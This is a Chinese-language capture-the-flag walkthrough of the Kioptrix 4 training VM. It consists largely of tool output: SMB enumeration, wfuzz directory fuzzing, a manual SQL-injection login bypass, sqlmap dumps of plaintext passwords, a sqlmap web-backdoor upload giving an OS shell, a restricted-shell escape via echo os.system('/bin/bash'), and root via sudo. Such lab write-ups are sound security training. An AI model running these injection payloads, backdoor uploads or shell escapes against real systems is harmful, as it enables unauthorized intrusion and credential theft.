============================================== | Nbtstat Information for 192.168.84.139 | ============================================== Looking up status of 192.168.84.139 KIOPTRIX4 <00> - B <ACTIVE> Workstation Service KIOPTRIX4 <03> - B <ACTIVE> Messenger Service KIOPTRIX4 <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
======================================= | Session Check on 192.168.84.139 | ======================================= [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.84.139/FUZZ Total requests: 3024 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000566: 403 10 L 33 W 329 Ch "cgi-bin/" 000001337: 301 9 L 31 W 356 Ch "images" 000001350: 200 45 L 94 W 1255 Ch "index" 000001458: 301 9 L 31 W 354 Ch "john" 000001629: 302 0 L 0 W 0 Ch "logout" 000001736: 302 1 L 22 W 220 Ch "member" 000002294: 301 9 L 31 W 356 Ch "robert" Total time: 3.234193 Processed Requests: 3024 Filtered Requests: 3017 Requests/sec.: 935.0089
访问页面,发现登录口存在sql注入漏洞
手工注入
用户名使用john,密码使用1’ or ‘1’=’1
得到两个密码
1 2 3 4 5
Username : john Password : MyNameIsJohn
Username : robert Password : ADGAdsafdfwt4gadfga==
root@kali:~# sqlmap -r sqlmap.txt ___ __H__ ___ ___[.]_____ ___ ___ {1.3.11#stable} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:21:00 /2019-12-10/
[01:21:00] [INFO] parsing HTTP request from 'sqlmap.txt' [01:21:00] [INFO] resuming back-end DBMS 'mysql' [01:21:00] [INFO] testing connection to the target URL [01:21:00] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login --- [01:21:00] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [01:21:00] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 01:25:36 /2019-12-10/ [01:25:36] [INFO] parsing HTTP request from 'sqlmap.txt' [01:25:36] [INFO] resuming back-end DBMS 'mysql' [01:25:36] [INFO] testing connection to the target URL [01:25:36] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login --- [01:25:36] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [01:25:36] [INFO] fetching columns for table 'members' in database 'members' [01:25:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [01:25:36] [INFO] retrieved: sqlmap got a 302 redirect to 'http://192.168.84.139:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n 3 [01:25:38] [INFO] retrieved: id [01:25:38] [INFO] retrieved: username [01:25:39] [INFO] retrieved: password [01:25:39] [INFO] fetching entries for table 'members' in database 'members' [01:25:39] [INFO] fetching number of entries for table 'members' in database 'members' [01:25:39] [INFO] retrieved: 2 [01:25:39] [INFO] retrieved: 1 [01:25:39] [INFO] retrieved: MyNameIsJohn [01:25:40] [INFO] retrieved: john [01:25:40] [INFO] retrieved: 2 [01:25:40] [INFO] retrieved: ADGAdsafdfwt4gadfga== [01:25:42] [INFO] retrieved: robert Database: members Table: members [2 entries] +----+-----------------------+----------+ | id | password | username | +----+-----------------------+----------+ | 1 | MyNameIsJohn | john | | 2 | ADGAdsafdfwt4gadfga== | robert | +----+-----------------------+----------+ [01:25:42] [INFO] table 'members.members' dumped to CSV file '/root/.sqlmap/output/192.168.84.139/dump/members/members.csv' [01:25:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139' [*] ending @ 01:25:42 /2019-12-10/
获取root权限
ssh连接之后发现许多命令无法执行,但是可以执行echo命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
root@kali:~# ssh john@192.168.84.139 The authenticity of host '192.168.84.139 (192.168.84.139)' can't be established. RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.84.139' (RSA) to the list of known hosts. john@192.168.84.139's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ ls john:~$ pwd *** unknown command: pwd john:~$ whoami *** unknown command: whoami john:~$echo 'casdcasdc' casdcasdc
john@Kioptrix4:/var/www$ ls checklogin.php index.php logout.php tmpbbmjx.php tmpbtzfy.php tmpuijdt.php database.sql john member.php tmpbdorc.php tmpubjrn.php tmpureio.php images login_success.php robert tmpbstyp.php tmpuepxr.php tmpuyhae.php
john@Kioptrix4:/var/www$ cat checklogin.php <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name $tbl_name="members"; // Table name
// Connect to server and select databse. mysql_connect("$host", "$username", "$password")or die("cannot connect"); mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword $myusername=$_POST['myusername']; $mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection) $myusername = stripslashes($myusername); //$mypassword = stripslashes($mypassword); $myusername = mysql_real_escape_string($myusername); //$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"); //$result=mysql_query($sql);
// Mysql_num_row is counting table row $count=mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){ // Register $myusername, $mypassword and redirect to file "login_success.php" session_register("myusername"); session_register("mypassword"); header("location:login_success.php?username=$myusername"); } else { echo"Wrong Username or Password"; print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>'); }
root@kali:~# ssh john@192.168.84.139 john@192.168.84.139's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ ls john@Kioptrix4:~$ mysql -h localhost -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 6760 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h'forhelp. Type '\c' to clear the buffer.
mysql> exit; Bye john@Kioptrix4:~$ sudo su root@Kioptrix4:/home/john# MyNameIsJohn bash: MyNameIsJohn: command not found root@Kioptrix4:/home/john# whoami root root@Kioptrix4:/home/john# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:/home/john# root@Kioptrix4:~# cat congrats.txt Congratulations! You've got root. There is more then one way to get root on this system. Try and find them. I've only tested two (2) methods, but it doesn't mean there aren't more. As always there's an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit. It took a while to make this. For one it's not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on: www.kioptrix.com Thanks for playing, loneferret
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:12:43 /2019-12-10/ [04:12:43] [INFO] parsing HTTP request from 'sqlmap.txt' [04:12:43] [INFO] resuming back-end DBMS 'mysql' [04:12:43] [INFO] testing connection to the target URL [04:12:43] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login --- [04:12:43] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:12:43] [INFO] testing if current user is DBA [04:12:43] [INFO] fetching current user [04:12:43] [INFO] resumed: root@localhost current user is DBA: True [04:12:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139' [*] ending @ 04:12:43 /2019-12-10/ (如果有,如下所示getshell) root@kali:~# sqlmap -r sqlmap.txt --os-shell ___ __H__ ___ ___[.]_____ ___ ___ {1.3.11#stable} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:10:50 /2019-12-10/ [04:10:50] [INFO] parsing HTTP request from 'sqlmap.txt' [04:10:50] [INFO] resuming back-end DBMS 'mysql' [04:10:50] [INFO] testing connection to the target URL [04:10:50] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login --- [04:10:50] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:10:50] [INFO] going to use a web backdoor for command prompt [04:10:50] [INFO] fingerprinting the back-end DBMS operating system [04:10:50] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) [04:10:51] [INFO] retrieved the web server document root: '/var/www' [04:10:51] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php' [04:10:51] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [04:10:51] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.84.139:80/tmpuhuus.php [04:10:51] [WARNING] unable to upload the file through the web file stager to '/var/www/' [04:10:51] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers [04:10:53] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.84.139:80/tmpbhqem.php [04:10:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> ls do you want to retrieve the command standard output? [Y/n/a] command standard output: --- checklogin.php database.sql images index.php john login_success.php logout.php member.php robert tmpbbmjx.php tmpbdorc.php tmpbhqem.php tmpbstyp.php tmpbtzfy.php tmpubjrn.php tmpuepxr.php tmpuhuus.php tmpuijdt.php tmpureio.php tmpuyhae.php --- os-shell>
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:42:12 /2019-12-10/ [04:42:12] [INFO] parsing HTTP request from 'sqlmap.txt' [04:42:12] [INFO] resuming back-end DBMS 'mysql' [04:42:12] [INFO] testing connection to the target URL [04:42:12] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login --- [04:42:12] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:42:12] [INFO] fingerprinting the back-end DBMS operating system [04:42:12] [INFO] the back-end DBMS operating system is Linux [04:42:12] [WARNING] expect junk characters inside the file as a leftover from original query [04:42:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrievalDBMS file system ('/var/www/bullshit.php')? [Y/n] [04:42:14] [INFO] retrieved: sqlmap got a 302 redirect to 'http://192.168.84.139:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n 0 [04:42:17] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path) [04:42:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139' [*] ending @ 04:42:17 /2019-12-10/ (成功写入) do you want to retrieve the command standard output? [Y/n/a] command standard output: --- checklogin.php database.sql images index.php john login_success.php logout.php member.php robert tmpbokko.php tmpuvljz.php --- os-shell> ls do you want to retrieve the command standard output? [Y/n/a] command standard output: --- bullshit.php checklogin.php database.sql images index.php john login_success.php logout.php member.php robert tmpbokko.php tmpuvljz.php --- os-shell>
